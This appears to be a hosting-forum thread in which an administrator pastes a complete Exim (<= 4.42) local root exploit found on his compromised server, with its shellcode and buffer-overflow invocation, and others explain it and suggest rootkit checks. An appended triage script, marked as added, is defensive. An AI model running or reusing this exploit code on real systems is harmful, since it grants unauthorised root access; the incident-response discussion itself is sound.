Thread: Exim exploit

  1. #1
    Join Date
    Aug 2002
    Posts
    1,632

    Exim exploit

    Hi

    Today I have found this Exim exploit on my server. What is the function of this script?


    #!/bin/sh

    ########### /str0ke
    # Ya I was a little late on this one.
    # Ref: http://www.milw0rm.com/id.php?id=756
    ########### /str0ke

    # Local Lame R00T sploit for exim <= 4.42
    # by Dark Eagle
    #
    # My First Coding Release In bash ))

    # Unl0ck Research Team
    #
    # More Effective than C-code.
    #
    # @env.c content:
    #
    ###################################################
    # #include <stdio.h>
    # #include <string.h>
    # int main(int argc, char *argv[])
    # {
    # char *addr_ptr;
    # addr_ptr = getenv(argv[1]);
    # printf("%s @ %p\n", argv[1], addr_ptr);
    # return 0;
    # }
    ###################################################

    gcc @env.c -o @env

    cp @env /usr/bin
    cd /usr/exim/bin

    CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
    \x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE

    @env CODE
    echo "So, dude, starting..."
    echo "NoW Just Type Address Of CODE"

    read ADDRESS

    echo "You are typed: $ADDRESS"

    echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"

    ./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`

  2. #2
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    Its goal is to gain local root by exploiting an older version of Exim.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  3. #3
    Join Date
    Aug 2002
    Posts
    1,632
    OK, I have 4.5. I have also found these files in the site directory:

    858 May 10 20:47 bd.pl
    313 May 10 20:45 bd.txt
    22389 Apr 27 18:12 bindz*
    15318 Jan 13 17:40 dtool2.php
    28402 May 10 20:56 elflbl*
    May 20 22:33 error_log
    1131 May 10 21:23 exim-xpl.sh*
    18831 May 10 20:57 expsta*
    2108 May 20 21:21 index.htm
    2523004 May 10 20:55 mremap*
    14080 May 10 20:59 yim*

  4. #4
    Join Date
    Jun 2003
    Posts
    961
    Who owns the files?

  5. #5
    Join Date
    Aug 2002
    Posts
    1,632
    The owner is nobody.

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    Someone sure does want root on your server. Several of those are root exploits. I would look at what script is being exploited and patch and/or remove it.

  7. #7
    Join Date
    May 2005
    Posts
    61
    I have seen some of them, like elflbl* and yim. They are root hack processes. What about chkrootkit and rkhunter? Also check the open ports on your machine to see whether something is listening.
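    One way to run the checks suggested in this thread (which files in the site directory belong to the web-server user, what kind of files they are, and what is listening), as an added example that is not from the thread or any of its posters. It assumes a POSIX sh with find, od and head, and ss or netstat for the port listing; the directory and owner are parameters, and the usage paths are placeholders.

```shell
#!/bin/sh
# Added triage helper, not from the thread. Assumes POSIX sh plus find, od,
# head; ss or netstat are only needed for the optional port listing.

# Classify a file by its first bytes: ELF binary, "#!" script, or other.
classify() {
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case $magic in
        7f454c46) echo ELF ;;      # \177ELF: dropped binaries such as elflbl, yim
        2321*)    echo script ;;   # "#!": shell/perl droppers such as exim-xpl.sh
        *)        echo other ;;
    esac
}

# Print "TYPE<TAB>PATH" for every regular file under DIR owned by OWNER
# (the web-server user, "nobody" in the thread) that is executable or has a
# script extension. Static web content should not contain such files.
suspicious_files() {
    dir=$1 owner=$2
    find "$dir" -type f -user "$owner" \
        \( -perm -100 -o -name '*.sh' -o -name '*.pl' -o -name '*.php' \) |
    sort | while IFS= read -r f; do
        printf '%s\t%s\n' "$(classify "$f")" "$f"
    done
}

# Listening sockets with their owning process, for the "is something
# listening" check. Falls back to netstat where ss is not installed.
listening_ports() {
    ss -lntup 2>/dev/null || netstat -lntup 2>/dev/null
}

# Usage: triage.sh /var/www/site nobody   (placeholder path and user)
if [ "$#" -eq 2 ]; then
    suspicious_files "$1" "$2"
    echo '--- listening sockets ---'
    listening_ports
fi
```

    Review the listed files by hand: the type column tells you whether a dropped file is a compiled binary or a script whose contents you can read directly.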

  8. #8
    Join Date
    May 2005
    Posts
    61
    Also, what kernel are you running? These kinds (yim and all) will not work in new kernels, I think.

  9. #9
    Join Date
    Aug 2002
    Posts
    1,632
    I use 2.6.11.10.
